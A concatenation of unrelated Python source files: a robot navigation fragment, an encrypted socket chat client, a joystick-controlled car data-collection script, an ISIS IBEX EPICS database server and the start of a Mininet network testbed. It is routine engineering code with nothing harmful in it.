time.sleep(0.5)
while (1):
tempo = andar_frente()
if (c=='Black'):#se ver Preto retorna até o ponto de referencia de onde saiu
retorno(tempo)
# se ver um novo ponto de referencia atualiza a memoria de tal cor, coloca na lista informações relativas ao descoberto e ao ultimo ligado a ele
if (diferente_de("White", "Black")):
tentativa=0#reseta a variavel tentativas o que indica que é um novo quadrado
memoria_cor[cor_atual]=orientacao
quads.append(quad(cor_atual,tempo,orientacao))
orientacao=0
start_time=0#reseta o timer
##print('achou novo')
|
Client.py
|
#!/usr/bin/env python
import os
import socket
import colorama
from threading import Thread
from AESCipher import AESCipher
from Cryptodome.PublicKey import RSA
from Cryptodome.Cipher import PKCS1_OAEP
import ast
import urllib.request
import shutil
import configparser
import argparse
def parse_config():
global publicKeyFile, port, do_encrypt, server_address, key_length, debug
publicKeyFile_default = 'public.pem'
port_default = 5006
do_encrypt_default = False
server_address_default = '127.0.0.1'
key_length_default = 16
debug_default = False
config_file_default = 'client.ini'
config = configparser.ConfigParser()
config.read(config_file)
section = "Client"
try:
config_client = config[section]
except:
publicKeyFile = publicKeyFile_default
port = port_default
do_encrypt = do_encrypt_default
server_address = server_address_default
key_length = key_length_default
debug = debug_default
if config_file != config_file_default:
print("\nSomething wrong with config file ({}).\n".format(config_file))
return
errorWith = []
publicKeyFile = config_client.get('publickeyfile', publicKeyFile_default)
try:
port = config_client.getint('port', port_default)
except:
errorWith.append('port')
port = port_default
try:
do_encrypt = config_client.getboolean('encrypt', do_encrypt_default)
except:
errorWith.append('encrypt')
do_encrypt = do_encrypt_default
server_address = config_client.get('serveraddress', server_address_default)
valid_key_lengths = [16, 24, 32]
try:
key_length = config_client.getint('keylength', key_length_default)
except:
errorWith.append('keylength')
key_length = key_length_default
if not key_length in valid_key_lengths:
key_length = key_length_default
errorWith.append('keylength')
try:
debug = config_client.getboolean('debug', debug_default)
except:
errorWith.append('debug')
debug = debug_default
print('Errors with loading [{}] from config file.'.format(', '.join(errorWith)) * bool(len(errorWith)))
def parse_args():
parser = argparse.ArgumentParser(description='Connect to a dedicated server.\nAll settings here override the config file.')
parser.add_argument('-p', '--port', type=int, help='Specify the port number to connect to.', action='store')
parser.add_argument('-sA', '--serveraddress', type=str, help='Specify the server address to connect to.', action='store')
parser.add_argument('-kL', '--keylength', type=int, help='Specify the AES key length.', action='store')
parser.add_argument('-nE', '--noencryption', help='Specify this to disable encryption.', action='store_true')
parser.add_argument('-pK', '--publickey', type=str, help='Specify the public key to use when connecting to the server.', action='store')
parser.add_argument('-c', '--config', type=str, help='Specify the config file to use.', action='store')
parser.add_argument('-d', '--debug', help=argparse.SUPPRESS, action='store_true')
args = parser.parse_args()
global publicKeyFile, port, do_encrypt, debug, server_address, key_length, config_file
if args.config:
config_file = args.config
parse_config()
if args.publickey:
publicKeyFile = args.publickey
if args.noencryption:
do_encrypt = not args.noencryption
if args.port:
port = args.port
if args.serveraddress:
server_address = args.serveraddress
if args.keylength:
key_length = args.keylength
if args.debug:
debug = args.debug
def decryptRSA(encrypted):
decryptor = PKCS1_OAEP.new(privateKey)
decrypted = decryptor.decrypt(ast.literal_eval(str(encrypted)))
return decrypted
def encryptRSA(decrypted):
encryptor = PKCS1_OAEP.new(publicKey)
encrypted = encryptor.encrypt(decrypted)
return encrypted
def decryptAES(encrypted, key):
decryptor = AESCipher(key)
decrypted = decryptor.decrypt(encrypted)
return decrypted
def encryptAES(decrypted, key):
encryptor = AESCipher(key)
encrypted = encryptor.encrypt(decrypted)
return encrypted
def sendToServer(message):
message = message.encode('utf-8')
if do_encrypt:
encMessage = encryptAES(message, key)
s.send(encMessage)
else:
s.send(message)
def clear():
if os.name == 'nt':
_ = os.system('cls')
else:
_ = os.system('clear')
def numberOfLines(message):
return (len(message) // shutil.get_terminal_size().columns) + 1
def listen():
while True:
try:
if do_encrypt:
inMessageEnc = s.recv(1024)
inMessage = decryptAES(inMessageEnc, key).decode('utf-8')
if inMessage == b'Encryption is not allowed here.':
print("Encryption is not allowed here, sorry.")
raise
else:
inMessage = s.recv(1024).decode('utf-8')
except Exception as err:
if debug:
print(err)
s.close()
exit()
print('\r\x1b[2K{}'.format(inMessage))
print("{}> ".format(name), end="", flush=True)
if __name__ == "__main__":
print("CLIENT")
config_file = 'client.ini'
parse_config()
parse_args()
if debug:
print("DEBUG")
#if not os.path.exists(publicKeyFile):
# print("Downloading public RSA key.")
# urllib.request.urlretrieve("http://{}/{}".format(server_address, publicKeyFile), publicKeyFile)
if do_encrypt:
with open(publicKeyFile, "r") as file:
publicKeyString = file.read()
publicKey = RSA.import_key(publicKeyString)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
colorama.init()
erase = '\x1b[1A\x1b[2K'
name = input("Your username: ")
try:
print("Connecting...\r", end="")
s.connect((server_address, port))
if do_encrypt:
key = os.urandom(key_length)
keyEnc = encryptRSA(key)
s.send(keyEnc)
print("Connected with AES.")
sendToServer(name)
if do_encrypt:
connectedEnc = s.recv(1024).decode('utf-8')
connected = decryptAES(connectedEnc, key).decode('utf-8')
else:
connected = s.recv(1024).decode('utf-8')
print(connected)
Thread(target=listen).start()
while True:
try:
outMessage = input("{}> ".format(name))
except KeyboardInterrupt:
print("\nOkay, bye.")
s.close()
exit()
if outMessage == "exit" or outMessage == "quit":
break
outMessageCombo = "{}> {}".format(name, outMessage)
print((erase * numberOfLines(outMessageCombo)) + outMessageCombo)
if outMessage == "cls" or outMessage == "clear":
clear()
continue
sendToServer(outMessage)
except Exception as err:
print("Cannot Connect To Server")
print("Check Configuration and Try Again")
if debug:
print(err)
finally:
try:
sendToServer('I am out.')
except Exception as err:
if debug:
print(err)
s.close()
print("Connection Closed With Server")
|
My_Data_Coll_collect.py
|
"""
get image from camera:/dev/video2 424*240
rocker:/dev/input/jso
save the data ../data/img ../data/data.npy
"""
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import v4l2capture
import select
from ctypes import *
import struct, array
from fcntl import ioctl
import cv2
import numpy as np
import time
from sys import argv
import multiprocessing
import time
import getopt
path = os.path.split(os.path.realpath(__file__))[0]+"/.."
#script, vels = argv
opts,args = getopt.getopt(argv[1:],'-hH',['vels=','output=','serial=','camera=','save_name='])
#print(opts)
camera = multiprocessing.Array("b",range(50))#camera
serial = multiprocessing.Array("b",range(50))#serial
output_data = multiprocessing.Array("b",range(50))#output_data
Speed = multiprocessing.Array("i",range(2))#speed and ansgle (int)
camera.value = "/dev/video2"
output_data.value = "data"
Speed[0] = 1500
Speed[1] = 1500
serial.value = "/dev/ttyUSB0"
save_name="img"
#camera = "/dev/video0"
for opt_name,opt_value in opts:
if opt_name in ('-h','-H'):
print("python3 Data_Coll.py --vels=1560 --output=data --serial=/dev/ttyUSB0 --camera=/dev/video0 --save_name=img ")
exit()
if opt_name in ('--vels'):
Speed[0] = int(opt_value)
if opt_name in ('--output'):
output_data.value = opt_value
if opt_name in ('--serial'):
serial.value = opt_value
if opt_name in ('--camera'):
camera.value = opt_value
print("camera.value=",camera.value)
if opt_name in ('--save_name'):
save_name = opt_value
print("save_name=",save_name)
'''创建一个互斥锁,默认是没有上锁的'''
lock = multiprocessing.Manager().Lock()
#a = multiprocessing.Value("i",0)
def mkdir(path):
if not os.path.exists(path):
os.makedirs(path)
#print("----- new folder -----")
#else:
#print('----- there is this folder -----')
def getvalue():
import os, struct, array
from fcntl import ioctl
print('avaliable devices')
for fn in os.listdir('/dev/input'):
if fn.startswith('js'):
print('/dev/input/%s' % fn)
axis_states = {}
button_states = {}
axis_names = {
0x00 : 'x',
0x01 : 'y',
0x02 : 'z',
0x03 : 'rx',
0x04 : 'ry',
0x05 : 'rz',
0x06 : 'trottle',
0x07 : 'rudder',
0x08 : 'wheel',
0x09 : 'gas',
0x0a : 'brake',
0x10 : 'hat0x',
0x11 : 'hat0y',
0x12 : 'hat1x',
0x13 : 'hat1y',
0x14 : 'hat2x',
0x15 : 'hat2y',
0x16 : 'hat3x',
0x17 : 'hat3y',
0x18 : 'pressure',
0x19 : 'distance',
0x1a : 'tilt_x',
0x1b : 'tilt_y',
0x1c : 'tool_width',
0x20 : 'volume',
0x28 : 'misc',
}
button_names = {
0x120 : 'trigger',
0x121 : 'thumb',
0x122 : 'thumb2',
0x123 : 'top',
0x124 : 'top2',
0x125 : 'pinkie',
0x126 : 'base',
0x127 : 'base2',
0x128 : 'base3',
0x129 : 'base4',
0x12a : 'base5',
0x12b : 'base6',
0x12f : 'dead',
0x130 : 'a',
0x131 : 'b',
0x132 : 'c',
0x133 : 'x',
0x134 : 'y',
0x135 : 'z',
0x136 : 'tl',
0x137 : 'tr',
0x138 : 'tl2',
0x139 : 'tr2',
0x13a : 'select',
0x13b : 'start',
0x13c : 'mode',
0x13d : 'thumbl',
0x13e : 'thumbr',
0x220 : 'dpad_up',
0x221 : 'dpad_down',
0x222 : 'dpad_left',
0x223 : 'dpad_right',
# XBox 360 controller uses these codes.
0x2c0 : 'dpad_left',
0x2c1 : 'dpad_right',
0x2c2 : 'dpad_up',
0x2c3 : 'dpad_down',
}
axis_map = []
button_map = []
fn = '/dev/input/js0'
jsdev = open(fn, 'rb')
buf = array.array('u',str(['\0']*5))
ioctl(jsdev, 0x80006a13 + (0x10000 * len(buf)), buf)
js_name = buf.tostring()
#js_name = buf.tobytes().decode('utf-8')
#print('device name: %s' % js_name)
# get number of axes and buttons
buf = array.array('B', [0])
ioctl(jsdev, 0x80016a11, buf) # JSIOCGAXES
num_axes = buf[0]
buf = array.array('B', [0])
ioctl(jsdev, 0x80016a12, buf) # JSIOCGBUTTONS
num_buttons = buf[0]
# Get the axis map
buf = array.array('B', [0] * 0x40)
ioctl(jsdev, 0x80406a32, buf) #JSIOCGAXMAP
for axis in buf[:num_axes]:
#print(axis)
axis_name = axis_names.get(axis, 'unknow(0x%02x)' % axis)
axis_map.append(axis_name)
axis_states[axis_name] = 0.0
# Get the button map.
buf = array.array('H', [0] * 200)
ioctl(jsdev, 0x80406a34, buf) # JSIOCGBTNMAP
for btn in buf[:num_buttons]:
btn_name = button_names.get(btn, 'unknown(0x%03x)' % btn)
button_map.append(btn_name)
button_states[btn_name] = 0
return axis_map, axis_states,button_map,button_states
def save_image_process(lock,n,status,start,Camera):
global path
global save_name
mkdir(path+"/data")
mkdir(path+"/data/"+save_name)
video = v4l2capture.Video_device(Camera.value)
video.set_format(424,240, fourcc='MJPG')
video.create_buffers(1)
video.queue_all_buffers()
video.start()
imgInd = 0
print("Wait Start!")
while(start.value == False):
pass
while status.value:#PS2 tr or tl control stop
while start.value: # When the car is suspended, do not save.
select.select((video,), (), ())
image_data = video.read_and_queue()
frame = cv2.imdecode(np.frombuffer(image_data, dtype=np.uint8), cv2.IMREAD_COLOR)
cv2.imwrite(path+"/data/"+save_name+"/{}.jpg".format(imgInd), frame)
lock.acquire()
n.value = True
lock.release()
imgInd+=1
key = cv2.waitKey(1)
if key & 0xFF == ord('q'):
break
def save_data_process(lock,n,data,run):
file_write = open(path + "/data/" + output_data.value + ".txt", "a")
while run.value:
while(n.value):
lock.acquire()
n.value = False
lock.release()
# Default_file_write
file_write.write(str(data[1]))
file_write.write("\n")
file_write.flush()
def control_car_process(data,status,run,start):
max_num = 2100
min_num = 700
while run.value:
speed_car = data[0]
angle_car = data[1]
fn = '/dev/input/js0'
jsdev = open(fn, 'rb')
car = serial.value
axis_map, axis_states, button_map, button_states = getvalue()
lib_path = path + "/lib" + "/libart_driver.so"
so = cdll.LoadLibrary
lib = so(lib_path)
try:
if (lib.art_racecar_init(38400, car.encode("utf-8")) < 0):
# raise Exception("init_error!")
pass
lib.send_cmd(1500, 1500)
while run.value:
evbuf = jsdev.read(8)
if evbuf:
time, value, type, number = struct.unpack('IhBB', evbuf)
if type & 0x01:
button = button_map[number]
if button:
button_states[button] = value
if(button == 'tl2' and button_states[button] == True):
# print("Low Speed")
start.value = True
speed_car = 1580
lib.send_cmd(speed_car, angle_car)
if(button == 'tr2' and button_states[button] == True):
# print("High Speed")
start.value = True
speed_car = 1600
lib.send_cmd(speed_car, angle_car)
if(button == "b" and button_states[button] == True):
# Pause
# print("Pause")
start.value = False
speed_car = 1500
angle_car = 1500
lib.send_cmd(speed_car, angle_car)
if(button == 'x' and button_states[button] == True):
# Stop
print("Stop")
status.value = False
speed_car = 1500
angle_car = 1500
lib.send_cmd(speed_car, angle_car)
# save data
data[0] = speed_car
data[1] = angle_car
if(start.value == True):#PS2 control speed and angle start
if type & 0x02:
axis = axis_map[number]
if axis:
if(axis == "x" or axis == 'z'):
if value > 0:
angle_car = 700
elif value < 0:
angle_car = 2300
else:
angle_car = 1500
lib.send_cmd(speed_car, angle_car)
# save data
data[0] = speed_car
data[1] = angle_car
except:
print("car run error")
finally:
lib.send_cmd(1500, 1500)
print("car run finally")
def txt_2_numpy():
angledata = []
data = []
file = open(path+"/data/"+ output_data.value+".txt","r")
for line in file.readlines():
line = line.strip('\n')
angledata.append(int(line))
angle = np.array(angledata)
np.save(path+"/data/"+ output_data.value+".npy", angle,False)
file.close()
if __name__ == '__main__':
Flag_save_data = multiprocessing.Value("i",False)#New img save flag
Status = multiprocessing.Value("i",True)#Run or Stop for PS2
START = multiprocessing.Value("i",False)#START
RUN = multiprocessing.Value("i",True)#SHUTDOWN
try:
process_car = multiprocessing.Process(target=control_car_process,args=(Speed,Status,RUN,START))
process_image = multiprocessing.Process(target=save_image_process,args=(lock,Flag_save_data,Status,START,camera,))
process_data = multiprocessing.Process(target=save_data_process,args=(lock,Flag_save_data,Speed,RUN,))
process_car.start()
process_image.start()
process_data.start()
while(1):
if(Status.value == 0):
time.sleep(1)
RUN.value = False
txt_2_numpy()
break
except:
RUN.value = False
print("error")
finally:
RUN.value = False
# print("finally")
|
database_server.py
|
from __future__ import print_function, absolute_import, division, unicode_literals
# This file is part of the ISIS IBEX application.
# Copyright (C) 2012-2016 Science & Technology Facilities Council.
# All rights reserved.
#
# This program is distributed in the hope that it will be useful.
# This program and the accompanying materials are made available under the
# terms of the Eclipse Public License v1.0 which accompanies this distribution.
# EXCEPT AS EXPRESSLY SET FORTH IN THE ECLIPSE PUBLIC LICENSE V1.0, THE PROGRAM
# AND ACCOMPANYING MATERIALS ARE PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND. See the Eclipse Public License v1.0 for more details.
#
# You should have received a copy of the Eclipse Public License v1.0
# along with this program; if not, you can obtain a copy from
# https://www.eclipse.org/org/documents/epl-v10.php or
# http://opensource.org/licenses/eclipse-1.0.php
# Add root path for access to server_commons
import os
import traceback
import six
import sys
import json
import argparse
import codecs
from functools import partial
from pcaspy import Driver
from time import sleep
from threading import Thread, RLock
sys.path.insert(0, os.path.abspath(os.environ["MYDIRBLOCK"]))
from DatabaseServer.exp_data import ExpData, ExpDataSource
from DatabaseServer.procserv_utils import ProcServWrapper
from DatabaseServer.options_holder import OptionsHolder
from DatabaseServer.options_loader import OptionsLoader
from genie_python.mysql_abstraction_layer import SQLAbstraction
from server_common.utilities import compress_and_hex, print_and_log, set_logger, convert_to_json, \
dehex_and_decompress, char_waveform
from server_common.channel_access_server import CAServer
from server_common.constants import IOCS_NOT_TO_STOP
from server_common.ioc_data import IOCData
from server_common.ioc_data_source import IocDataSource
from server_common.pv_names import DatabasePVNames as DbPVNames
from server_common.loggers.isis_logger import IsisLogger
set_logger(IsisLogger())
MACROS = {
"$(MYPVPREFIX)": os.environ['MYPVPREFIX'],
"$(EPICS_KIT_ROOT)": os.environ['EPICS_KIT_ROOT'],
"$(ICPCONFIGROOT)": os.environ['ICPCONFIGROOT']
}
LOG_TARGET = "DBSVR"
INFO_MSG = "INFO"
MAJOR_MSG = "MAJOR"
class DatabaseServer(Driver):
"""
The class for handling all the static PV access and monitors etc.
"""
def __init__(self, ca_server: CAServer, ioc_data: IOCData, exp_data: ExpData, options_folder: str,
blockserver_prefix: str, test_mode: bool = False):
"""
Constructor.
Args:
ca_server: The CA server used for generating PVs on the fly
ioc_data: The data source for IOC information
exp_data: The data source for experiment information
options_folder: The location of the folder containing the config.xml file that holds IOC options
blockserver_prefix: The PV prefix to use
test_mode: Enables starting the server in a mode suitable for unit tests
"""
if not test_mode:
super(DatabaseServer, self).__init__()
self._blockserver_prefix = blockserver_prefix
self._ca_server = ca_server
self._options_holder = OptionsHolder(options_folder, OptionsLoader())
self._pv_info = self._generate_pv_acquisition_info()
self._iocs = ioc_data
self._ed = exp_data
if self._iocs is not None and not test_mode:
# Start a background thread for keeping track of running IOCs
self.monitor_lock = RLock()
monitor_thread = Thread(target=self._update_ioc_monitors, args=())
monitor_thread.daemon = True # Daemonise thread
monitor_thread.start()
def _generate_pv_acquisition_info(self) -> dict:
"""
Generates information needed to get the data for the DB PVs.
Returns:
Dictionary containing the information to get the information for the PVs
"""
enhanced_info = DatabaseServer.generate_pv_info()
def add_get_method(pv, get_function):
enhanced_info[pv]['get'] = get_function
add_get_method(DbPVNames.IOCS, self._get_iocs_info)
add_get_method(DbPVNames.HIGH_INTEREST, partial(self._get_interesting_pvs, "HIGH"))
add_get_method(DbPVNames.MEDIUM_INTEREST, partial(self._get_interesting_pvs, "MEDIUM"))
add_get_method(DbPVNames.LOW_INTEREST, partial(self._get_interesting_pvs, "LOW"))
add_get_method(DbPVNames.FACILITY, partial(self._get_interesting_pvs, "FACILITY"))
add_get_method(DbPVNames.ACTIVE_PVS, self._get_active_pvs)
add_get_method(DbPVNames.ALL_PVS, partial(self._get_interesting_pvs, ""))
add_get_method(DbPVNames.SAMPLE_PARS, self._get_sample_par_names)
add_get_method(DbPVNames.BEAMLINE_PARS, self._get_beamline_par_names)
add_get_method(DbPVNames.USER_PARS, self._get_user_par_names)
add_get_method(DbPVNames.IOCS_NOT_TO_STOP, DatabaseServer._get_iocs_not_to_stop)
return enhanced_info
@staticmethod
def generate_pv_info() -> dict:
"""
Generates information needed to construct PVs. Must be consumed by Server before
DatabaseServer is initialized so must be static
Returns:
Dictionary containing the information to construct PVs
"""
pv_size_256k = 256000
pv_size_10k = 10000
pv_info = {}
for pv in [DbPVNames.IOCS, DbPVNames.HIGH_INTEREST, DbPVNames.MEDIUM_INTEREST, DbPVNames.LOW_INTEREST,
DbPVNames.FACILITY, DbPVNames.ACTIVE_PVS, DbPVNames.ALL_PVS, DbPVNames.IOCS_NOT_TO_STOP]:
pv_info[pv] = char_waveform(pv_size_256k)
for pv in [DbPVNames.SAMPLE_PARS, DbPVNames.BEAMLINE_PARS, DbPVNames.USER_PARS]:
pv_info[pv] = char_waveform(pv_size_10k)
return pv_info
def get_data_for_pv(self, pv: str) -> bytes:
"""
Get the data for the given pv name.
Args:
The name of the PV to get the data for.
Return:
The data, compressed and hexed.
"""
data = self._pv_info[pv]['get']()
data = compress_and_hex(six.text_type(json.dumps(data)))
self._check_pv_capacity(pv, len(data), self._blockserver_prefix)
return data
def read(self, reason: str) -> str:
"""
A method called by SimpleServer when a PV is read from the DatabaseServer over Channel Access.
Args:
reason: The PV that is being requested (without the PV prefix)
Returns:
A compressed and hexed JSON formatted string that gives the desired information based on reason.
"""
return self.get_data_for_pv(reason) if reason in self._pv_info.keys() else self.getParam(reason)
def write(self, reason: str, value: str) -> bool:
"""
A method called by SimpleServer when a PV is written to the DatabaseServer over Channel Access.
Args:
reason: The PV that is being requested (without the PV prefix)
value: The data being written to the 'reason' PV
Returns:
True
"""
try:
if reason == 'ED:RBNUMBER:SP':
self._ed.update_experiment_id(value)
elif reason == 'ED:USERNAME:SP':
self._ed.update_username(dehex_and_decompress(value.encode('utf-8')).decode('utf-8'))
except Exception as e:
value = compress_and_hex(convert_to_json("Error: " + str(e)))
print_and_log(str(e), MAJOR_MSG)
# store the values
self.setParam(reason, value)
return True
def _update_ioc_monitors(self) -> None:
"""
Updates all the PVs that hold information on the IOCS and their associated PVs.
"""
while True:
if self._iocs is not None:
self._iocs.update_iocs_status()
for pv in [DbPVNames.IOCS, DbPVNames.HIGH_INTEREST, DbPVNames.MEDIUM_INTEREST, DbPVNames.FACILITY,
DbPVNames.ACTIVE_PVS, DbPVNames.ALL_PVS]:
encoded_data = self.get_data_for_pv(pv)
# No need to update monitors if data hasn't changed
if not self.getParam(pv) == encoded_data:
self.setParam(pv, encoded_data)
# Update them
with self.monitor_lock:
self.updatePVs()
sleep(1)
def _check_pv_capacity(self, pv: str, size: int, prefix: str) -> None:
"""
Check the capacity of a PV and write to the log if it is too small.
Args:
pv: The PV that is being requested (without the PV prefix)
size: The required size
prefix: The PV prefix
"""
if size > self._pv_info[pv]['count']:
print_and_log("Too much data to encode PV {0}. Current size is {1} characters but {2} are required"
.format(prefix + pv, self._pv_info[pv]['count'], size),
MAJOR_MSG, LOG_TARGET)
def _get_iocs_info(self) -> dict:
iocs = self._iocs.get_iocs()
options = self._options_holder.get_config_options()
for iocname in iocs.keys():
if iocname in options:
iocs[iocname].update(options[iocname])
return iocs
def _get_pvs(self, get_method: callable, replace_pv_prefix: bool, *get_args: list) -> list:
"""
Method to get pv data using the given method called with the given arguments and optionally remove instrument
prefixes from pv names.
Args:
get_method: The method used to get pv data.
replace_pv_prefix: True to remove pv prefixes, False if not.
get_args: The arguments to be applied to get_method.
Returns:
a list of names of pvs.
"""
if self._iocs is not None:
pv_data = get_method(*get_args)
if replace_pv_prefix:
pv_data = [p.replace(MACROS["$(MYPVPREFIX)"], "") for p in pv_data]
return pv_data
else:
return []
def _get_interesting_pvs(self, level) -> list:
"""
Gets interesting pvs of the current instrument.
Args:
level: The level of high interesting pvs, can be high, low, medium or facility. If level is an empty
string, it returns all interesting pvs of all levels.
Returns:
a list of names of pvs with given level of interest.
"""
return self._get_pvs(self._iocs.get_interesting_pvs, False, level)
def _get_active_pvs(self) -> list:
"""
Gets all pvs belonging to IOCs that are currently running on the current instrument.
Returns:
a list of names of pvs.
"""
return self._get_pvs(self._iocs.get_active_pvs, False)
def _get_sample_par_names(self) -> list:
"""
Returns the sample parameters from the database, replacing the MYPVPREFIX macro.
Returns:
A list of sample parameter names, an empty list if the database does not exist
"""
return self._get_pvs(self._iocs.get_sample_pars, True)
def _get_beamline_par_names(self) -> list:
"""
Returns the beamline parameters from the database, replacing the MYPVPREFIX macro.
Returns:
A list of beamline parameter names, an empty list if the database does not exist
"""
return self._get_pvs(self._iocs.get_beamline_pars, True)
def _get_user_par_names(self) -> list:
"""
Returns the user parameters from the database, replacing the MYPVPREFIX macro.
Returns:
A list of user parameter names, an empty list if the database does not exist
"""
return self._get_pvs(self._iocs.get_user_pars, True)
@staticmethod
def _get_iocs_not_to_stop() -> list:
"""
Get the IOCs that are not to be stopped.
Returns:
A list of IOCs not to stop
"""
return IOCS_NOT_TO_STOP
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-bs', '--blockserver_prefix', nargs=1, type=str,
default=[MACROS["$(MYPVPREFIX)"]+'CS:'],
help='The prefix for PVs served by the blockserver(default=%MYPVPREFIX%CS:)')
parser.add_argument('-od', '--options_dir', nargs=1, type=str, default=['.'],
help='The directory from which to load the configuration options(default=current directory)')
args = parser.parse_args()
BLOCKSERVER_PREFIX = args.blockserver_prefix[0]
if not BLOCKSERVER_PREFIX.endswith(':'):
BLOCKSERVER_PREFIX += ":"
BLOCKSERVER_PREFIX = BLOCKSERVER_PREFIX.replace('%MYPVPREFIX%', MACROS["$(MYPVPREFIX)"])
print_and_log("BLOCKSERVER PREFIX = %s" % BLOCKSERVER_PREFIX, INFO_MSG, LOG_TARGET)
OPTIONS_DIR = os.path.abspath(args.options_dir[0])
print_and_log("OPTIONS DIRECTORY = %s" % OPTIONS_DIR, INFO_MSG, LOG_TARGET)
if not os.path.isdir(os.path.abspath(OPTIONS_DIR)):
# Create it then
os.makedirs(os.path.abspath(OPTIONS_DIR))
SERVER = CAServer(BLOCKSERVER_PREFIX)
SERVER.createPV(BLOCKSERVER_PREFIX, DatabaseServer.generate_pv_info())
SERVER.createPV(MACROS["$(MYPVPREFIX)"], ExpData.EDPV)
# Initialise IOC database connection
try:
ioc_data = IOCData(IocDataSource(SQLAbstraction("iocdb", "iocdb", "$iocdb")), ProcServWrapper(),
MACROS["$(MYPVPREFIX)"])
print_and_log("Connected to IOCData database", INFO_MSG, LOG_TARGET)
except Exception as e:
ioc_data = None
print_and_log("Problem initialising IOCData DB connection: {}".format(traceback.format_exc()),
MAJOR_MSG, LOG_TARGET)
# Initialise experimental database connection
try:
exp_data = ExpData(MACROS["$(MYPVPREFIX)"], ExpDataSource())
print_and_log("Connected to experimental details database", INFO_MSG, LOG_TARGET)
except Exception as e:
exp_data = None
print_and_log("Problem connecting to experimental details database: {}".format(traceback.format_exc()),
MAJOR_MSG, LOG_TARGET)
DRIVER = DatabaseServer(SERVER, ioc_data, exp_data, OPTIONS_DIR, BLOCKSERVER_PREFIX)
# Process CA transactions
while True:
try:
SERVER.process(0.1)
except Exception as err:
print_and_log(traceback.format_exc(), MAJOR_MSG)
break
|
EndpointTP_testbed.py
|
#!/usr/bin/python3
from mininet.net import Mininet
from mininet.node import Controller, OVSSwitch, RemoteController, OVSKernelSwitch, IVSSwitch, UserSwitch
from mininet.link import Link, TCLink
from mininet.cli import CLI
from mininet.log import setLogLevel
import time
import threading
from util.setup import SetupUtil
from util.test import TestUtil
from util.services import ServicesUtil
setup = SetupUtil()
test = TestUtil()
service = ServicesUtil()
class EndpointTPTestbed:
def __init__(self):
self.switches = []
self.controllers = []
self.gatewayTPs = []
self.hosts = []
topo = {
'Site 1':{
'tpAddr':'30.0.0.1',
'ip_range':'10.0.0.0/8',
'eTP_Port':6633,
'default_gw_name':'h1',
'default_gw':'10.0.0.1',
'site_switch':'s1',
'site_controller':'c1',
'Hosts':{
'h11':{
'ip':'10.0.1.2'
},
'h12':{
'ip':'10.1.0.3'
},
'h13':{
'ip':'10.2.0.4'
}
}
},
'Site 2':{
'tpAddr':'30.0.0.2',
'ip_range':'20.0.0.0/8',
'eTP_Port':6634,
'default_gw_name':'h2',
'default_gw':'20.0.0.1',
'site_switch':'s2',
'site_controller':'c2',
'Hosts':{
'h21':{
'ip':'20.0.1.2'
},
'h22':{
'ip':'20.2.0.3'
}
}
}
}
def topology(self):
"Create a network."
net = Mininet( controller=RemoteController, link=TCLink, switch=OVSKernelSwitch )
service.start_Mondrian_Controller()
for site in self.topo:
site_info = self.topo[site]
# Start Endpoint TP
service.start_Endpoint_TP(tpAddr=site_info['tpAddr'], endpointTPPort=site_info['eTP_Port'])
self.controllers.append((net.addController( site_info['site_controller'],ip='localhost',port=site_info['eTP_Port']),site))
# Start site Switch
self.switches.append((net.addSwitch(site_info['site_switch'], cls = OVSSwitch, protocols='OpenFlow13'),site))
# Start Gateway TP and connect to site Switch
self.gatewayTPs.append((net.addHost(site_info['default_gw_name'], ip=site_info['default_gw']),site))
net.addLink(self.gatewayTPs[-1][0], self.switches[-1][0])
# Start Hosts and connect to site Switch
hosts_info = site_info['Hosts']
for host in hosts_info:
self.hosts.append((net.addHost(host, ip=hosts_info[host]['ip']),site))
net.addLink(self.hosts[-1][0], self.switches[-1][0])
# Create full mesh between Gateway TPs
for i, g0 in zip(range(len(self.gatewayTPs)), self.gatewayTPs):
for j, g1 in zip(range(len(self.gatewayTPs)), self.gatewayTPs):
if j>i:
net.addLink(g0[0], g1[0])
print ("*** Starting network")
net.build()
print("*** Config the hosts")
for site in self.topo:
site_info = self.topo[site]
print("*** Config hosts of "+str(site))
for h in self.hosts:
if h[1]==site:
setup.set_up_interface(h[0], if_name='eth0', ip_addr=site_info['Hosts'][h[0].name]['ip'], net_mask='255.0.0.0')
setup.set_up_default_gw(h[0], gw=site_info['default_gw'])
print("*** Config Gateway TP of "+str(site))
for g in self.gatewayTPs:
if g[1]==site:
setup.set_up_interface(g[0], if_name='eth0', ip_addr=site_info['default_gw'], net_mask='255.0.0.0')
setup.set_up_interface(g[0], if_name='eth1', ip_addr=site_info['tpAddr'], net_mask='255.0.0.0')
setup.set_up_forwarding(g[0])
# Add routes to other Sites
for other_site in self.topo:
if other_site != site:
setup.set_up_route(host=g[0], dest=self.topo[other_site]['ip_range'], via=self.topo[other_site]['tpAddr'])
print("*** Start Controllers")
for c in self.controllers:
c[0].start()
print("*** Map Switches to Controllers")
for s in self.switches:
s[0].start([c[0] for c in self.controllers if c[1]==s[1]])
self.net = net
def test_intra_zone(self):
'''
Test if all connections work for intra zone traffic (Zone 1)
both intra and inter domain for the protocols TCP, UDP and ICMP
'''
test.prefix = "[Intra Zone Test] "
host_dict = self.get_host_dict()
success = True
print("*** Intra Zone Test started")
# ICMP
success = success and test.test_icmp(host_dict['h11'], host_dict['h12'])
success = success and test.test_icmp(host_dict['h11'], host_dict['h21'])
success = success and test.test_icmp(host_dict['h12'], host_dict['h11'])
success = success and test.test_icmp(host_dict['h12'], host_dict['h21'])
success = success and test.test_icmp(host_dict['h21'], host_dict['h11'])
success = success and test.test_icmp(host_dict['h21'], host_dict['h12'])
# TCP
success = success and test.test_tcp(host_dict['h11'], host_dict['h12'])
success = success and test.test_tcp(host_dict['h11'], host_dict['h21'])
success = success and test.test_tcp(host_dict['h12'], host_dict['h11'])
success = success and test.test_tcp(host_dict['h12'], host_dict['h21'])
success = success and test.test_tcp(host_dict['h21'], host_dict['h11'])
success = success and test.test_tcp(host_dict['h21'], host_dict['h12'])
# UDP
success = success and test.test_udp(host_dict['h11'], host_dict['h12'])
success = success and test.test_udp(host_dict['h11'], host_dict['h21'])
success = success and test.test_udp(host_dict['h12'], host_dict['h11'])
success = success and test.test_udp(host_dict['h12'], host_dict['h21'])
success = success and test.test_udp(host_dict['h21'], host_dict['h11'])
success = success and test.test_udp(host_dict['h21'], host_dict['h12'])
if success:
print("*** Intra Zone Test passed")
else:
print("*** Intra Zone Test failed")
